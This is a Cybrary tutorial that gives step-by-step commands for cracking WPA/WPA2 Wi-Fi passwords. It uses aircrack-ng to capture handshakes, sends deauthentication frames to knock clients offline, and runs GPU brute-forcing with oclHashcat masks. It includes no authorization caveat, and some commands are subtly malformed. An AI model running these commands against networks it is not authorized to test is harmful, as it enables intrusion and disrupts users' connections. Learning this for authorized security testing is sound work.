Ready to Start Your Career?

Use GPU to Speed Up WPA/WPA2 Password Cracking

darkangel4 's profile image

By: darkangel4

August 27, 2015

Use GPU to Speed Up WPA/WPA2 Password Cracking - CybraryThere are many ways to crack a WPA/WPA2 password. We all know that a GPU (Graphic Processing Unit) is way faster than a CPU in terms of computation. So, we'll use the power of GPU to speed up WPA/WPA2 cracking.The tools used will be (available for both windows and Linux.)
  1. Aircrack-ng
  2. Oclhashcat
This guide assumes the following things:
  • wlan0                             is a WiFi interface
  • mon0                             is the interface in monitor mode
  • <channel>                     refers to the channel the target Wi-Fi is operating on
  • 00:2d:37:4b:e4:d5      is the MAC address of target AP (access point) (not real)
  • cc:cc:4e:5b:d7:3d         is MAC of client associated with the target AP (not real)
  • # (hash symbol)           is used to mark start of a command
 Steps:Open up a terminalStart by putting Wi-Fi interface in monitor mode

#airmon-ng start wlan0

This puts Wi-Fi in monitor mode and creates a new interface mon0 to sniff traffic.Then, start sniffing air for all AP's in the area.

#airodump-ng mon0

This will give you information about all AP's in your vicinity. Select one with highest strength and focus on that one.Press Ctrl+C to stop above command and type:

#airodump-ng –c --bssid 00:2d:37:4b:e4:d5 –w mon0

 This command only sniffs for one specific AP:-c tells which channel to sniff-bssid is the MAC of AP to target-w tell to write a file to capture handshake (for later use in recovering password)mon0 is the monitor interfaceNotice the MAC address of clients shown in the terminal; we'll need it for the next step. Now, open a second terminal and type:

#aireplay-ng -0 5 –a 00:2d:37:4b:e4:d5 –c cc:cc:4e:5b:d7:3d mon0

This command says to de-authenticate a client from its AP-0 tell how many time to send deauth signal (in this case 5 times)-a tell the MAC of AP-c tell the MAC of client connect to AP (Note: you can do a broadcast deauth, but it doesn’t work all the time. Target a specific client instead.)mon0 is our interface. Once you see that airodump-ng shows Handshake captured in upper-right corner, stop the process (otherwise, it keeps deauthing the clients).Once handshake file is captured and written (in format file.cap), clean the file using the following command:

#wpaclean clean_file.cap captured.cap

Here, clean_file.cap is output file. And, captured.cap is the input file (the file you captured). Now, prepare the file for hashcat by:

#aircrack-ng clean_file.cap -J for_cat

Here, clean_file.cap is from previous step. And, for_cat is for hashcat use (it will automatically add .hccap extension) Now, begin the cracking process by:

#oclhashcat –m 2500 –a 3 --session=my_session /for_cat.hccap /mymask.hcmask

Here, –m 2500 tell to crack WPA/WPA2-a 3 tells to use brute-force or mask based brute force (more on it later)-session=my_session tell to save the session (in case you plan to resume it later, it takes a very long time.)/for_cat.hccap is path to your captured and cleaned prepared hashcat file/mymask.hccap is path to the mask fileOnce it's done, the saved password will be stored in a .pot file (located in /usr/share/oclhashcat/ for kali) NOTES ON HASHCAT MASKSThe mask can take following format:
  • ?u for upper case letters (ABC…)
  • ?l for lower case letters (abc…)
  • ?d for numbers
  • ?s for symbols (ASCII only I think)
  • ?a use all of the above characters
Thus to create a mask type in a black file:
  • ?d?d?d?d?d?d?d?d for a 8 digit password
 That’s it for this tutorial. Honorable mention goes to blackMORE Ops.
Schedule Demo
Build your Cybersecurity or IT Career
Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry